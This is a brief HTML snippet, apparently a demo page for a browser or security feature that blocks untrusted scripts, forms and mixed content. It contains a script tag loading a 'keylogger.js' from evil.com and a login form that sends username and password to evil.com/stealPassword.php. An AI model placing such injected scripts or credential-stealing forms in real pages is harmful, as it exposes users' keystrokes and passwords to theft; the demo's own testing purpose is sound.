Let's load a bad script!

<script src="https://evil.com/keylogger.js"></script>


Who trusts this form?

<form action="https://evil.com/stealPassword.php">
<input type="text" name="firstname" value="Username">
<input type="text" name="lastname" value="Password">
<input type="submit" value="Submit">
</form> 


Mixed content gets fixed too!

<img src="http://cdn.pixabay.com/photo/2019/11/08/11/56/cat-4611189_1280.jpg">